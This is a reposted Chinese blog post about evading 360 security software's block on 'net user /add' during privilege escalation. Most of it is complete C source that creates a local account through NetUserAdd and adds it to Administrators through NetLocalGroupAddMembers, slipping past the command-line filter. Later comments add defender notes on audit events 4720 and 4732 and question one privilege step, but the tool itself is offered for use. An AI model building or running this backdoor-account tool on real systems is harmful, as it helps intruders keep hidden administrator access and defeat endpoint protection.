• 转载 突破360防黑加固添加用户


    360功能多,现在大多数管理员图省事,喜欢装个360。360有个“防黑加固”功能比较坑爹:提权的时候经常会用到 net user xxx xxx /add 和 net localgroup xxx xxx /add,这两条命令都会被360拦截,如图:
    
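    net user 和 net1 user 都被拦截了,把程序改名后执行也同样被拦截,想来这功能也不至于这么鸡肋。当然360还会拦截其他命令,这次只讨论 net user xxx xx /add。于是索性自己用C写了一个直接调用系统API添加用户的程序,结果被360完全无视了。由此看来,这类拦截很可能只覆盖了 net/net1 的命令行调用,并没有覆盖底层的账户管理API;防守方不能只依赖它,还应开启账户管理审核,监控安全日志中的账户创建(事件ID 4720)和本地组成员添加(事件ID 4732)。如图: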
    
    源码:
    //Code by Pnig0s1992  
    //Date:2012,3,17  
    #include <stdio.h>  
    #include <Windows.h>  
    #include <lm.h>  
     
    #pragma comment(lib,"Netapi32.lib")  
     
    // Forward declarations for the helpers defined after main().
    // AddUser: creates an account by calling NetUserAdd.
    int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);  
    // SetGroup: adds an account to a local group by calling NetLocalGroupAddMembers.
    int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);  
    // ImprovePriv: enables the named privilege on the current process token.
    BOOL ImprovePriv(LPWSTR name);  
     
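    // Entry point. Expects "UserName Password" on the command line, converts
    // both from the ANSI code page to UTF-16, creates the account and adds it
    // to the local group named "Administrators".
    //
    // Returns 0 once both helper calls have been attempted, -1 on bad usage,
    // on a failed privilege adjustment, or on a failed string conversion.
    // (The original returned `false`, i.e. exit code 0, when the conversion
    // failed, and never released the converted buffers.)
    //
    // Notes for defenders reading this sample:
    //  - No net.exe / net1.exe process is started; the account is created by
    //    calling Netapi32 directly, so a control that only matches the
    //    "net user ... /add" command line has nothing to match on.
    //  - With account-management auditing enabled, Windows still records the
    //    result: Security event 4720 (user account created) and 4732 (member
    //    added to a security-enabled local group). Match on the group SID
    //    S-1-5-32-544 rather than on the display name "Administrators".
    //  - The password arrives in argv, so it is visible to process-creation
    //    logging that captures command lines.
    //  - NOTE(review): the calls below presumably succeed only when the caller
    //    already holds account-creation rights on the machine; confirm against
    //    the NetUserAdd documentation.
    //  - NOTE(review): SE_MACHINE_ACCOUNT_NAME is the "add workstations to
    //    domain" privilege; it does not look related to NetUserAdd. Confirm
    //    whether this step is needed at all.
    int main(INT argc,char * argv[])
    {
        // Check the arguments first so a usage error does not touch the token.
        if(argc < 3)
        {
            printf("\nCode by Pnig0s1992");
            printf("\nUsage:");
            printf("\n\t%s UserName Password",argv[0]);
            printf("\n\tRemark:Default add to Group:Administrators.");
            return -1;
        }

        if(!ImprovePriv(SE_MACHINE_ACCOUNT_NAME))
        {
            printf("Failed promote priv.");
            return -1;
        }
        printf("Successfully promote priv!");

        int exitCode = -1;
        wchar_t *wUserName = NULL;
        wchar_t *wPassword = NULL;
        // Writable array: the helper takes a non-const LPWSTR.
        wchar_t wGroupName[] = L"Administrators";

        // With cbMultiByte == -1 the returned count already includes the
        // terminating NUL; 0 means the conversion cannot be performed.
        int Namesize = MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0);
        int Passsize = MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0);
        if(Namesize > 0 && Passsize > 0)
        {
            wUserName = new wchar_t[Namesize];
            wPassword = new wchar_t[Passsize];
            if(MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize) &&
               MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize))
            {
                // NULL server name: both calls act on the local machine.
                AddUser(wUserName,wPassword,NULL);
                SetGroup(wUserName,NULL,wGroupName);
                exitCode = 0;
            }
        }

        // delete[] on a null pointer is a no-op, so no guards are needed.
        delete[] wUserName;
        delete[] wPassword;
        return exitCode;
    }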
     
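    // Enables the privilege called `name` on the current process token.
    //
    // Returns TRUE when OpenProcessToken, LookupPrivilegeValue and
    // AdjustTokenPrivileges all report success; otherwise prints the failing
    // step with GetLastError() and returns FALSE.
    //
    // Changes from the original: the token handle is closed on every path
    // (it leaked when the lookup or the adjustment failed), and the DWORD
    // error code is printed with %lu instead of %d.
    //
    // NOTE(review): AdjustTokenPrivileges can return nonzero while
    // GetLastError() is ERROR_NOT_ALL_ASSIGNED, i.e. the token does not hold
    // the privilege at all. TRUE from this function therefore does not prove
    // the privilege is enabled. The return value is left as it was so the
    // caller-visible behaviour does not change.
    //
    // Assumes a UNICODE build: `name` is an LPWSTR passed to the TCHAR form
    // of LookupPrivilegeValue.
    BOOL ImprovePriv(LPWSTR name)
    {
        HANDLE hToken = NULL;
        if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))
        {
            printf("\nGet process token failed.(%lu)",GetLastError());
            return FALSE;
        }

        BOOL bEnabled = FALSE;
        TOKEN_PRIVILEGES tkp;
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        // GetLastError() is evaluated as a printf argument, before
        // CloseHandle below can overwrite the thread's last-error value.
        if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid))
        {
            printf("\nLookup process priv failed.(%lu)",GetLastError());
        }
        else if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL))
        {
            printf("\nAjust process priv failed.(%lu)",GetLastError());
        }
        else
        {
            bEnabled = TRUE;
        }

        CloseHandle(hToken);
        return bEnabled;
    }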
     
    // Creates an account through NetUserAdd at information level 1
    // (USER_INFO_1) and prints the outcome.
    //
    //   lpUsername   - account name to create
    //   lpPassword   - initial password
    //   lpServerName - target server; main() passes NULL for the local machine
    //
    // The account is created with USER_PRIV_USER and the UF_SCRIPT flag; home
    // directory, comment and script path are left NULL. Always returns 0, so
    // callers cannot tell success from failure by the return value.
    //
    // Defender note: this is the API behind "net user /add". When
    // account-management auditing is on, a successful call is recorded as
    // Security event 4720 regardless of which program made it.
    int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName)
    {
        DWORD dwParmErr = 0;
        USER_INFO_1 account;
        account.usri1_script_path = NULL;
        account.usri1_flags = UF_SCRIPT;
        account.usri1_comment = NULL;
        account.usri1_home_dir = NULL;
        account.usri1_priv = USER_PRIV_USER;
        account.usri1_password = lpPassword;
        account.usri1_name = lpUsername;

        // Level 1 tells NetUserAdd the buffer is a USER_INFO_1.
        const NET_API_STATUS result = NetUserAdd(lpServerName,1,(LPBYTE)&account,&dwParmErr);
        if(result != NERR_Success)
        {
            printf("\nAdd user failed:%d.",result);
            return 0;
        }

        printf("\nAdd user:%S successfully!",lpUsername);
        return 0;
    }
     
    // Adds lpUsername to the local group lpGroupName through
    // NetLocalGroupAddMembers at level 3 (LOCALGROUP_MEMBERS_INFO_3, one
    // entry) and prints the outcome.
    //
    //   lpUsername   - account to add, passed as the domain-and-name field
    //   lpServerName - target server; main() passes NULL for the local machine
    //   lpGroupName  - local group name; main() passes "Administrators"
    //
    // Always returns 0, whatever the API status was.
    //
    // Defender note: this is the API behind "net localgroup /add". With
    // account-management auditing on, a successful call is recorded as
    // Security event 4732; alert on additions to the group with SID
    // S-1-5-32-544.
    int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName)
    {
        LOCALGROUP_MEMBERS_INFO_3 member;
        member.lgrmi3_domainandname = lpUsername;

        const NET_API_STATUS result =
            NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&member,1);

        switch(result)
        {
        case NERR_Success:
            printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);
            break;
        case NERR_GroupNotFound:
            printf("\nCan't find such a group:%S.",lpGroupName);
            break;
        default:
            printf("\nSet GROUP:%S failed.",lpGroupName);
            break;
        }
        return 0;
    }
     
  • 原文地址:https://www.cnblogs.com/xiao0/p/2630057.html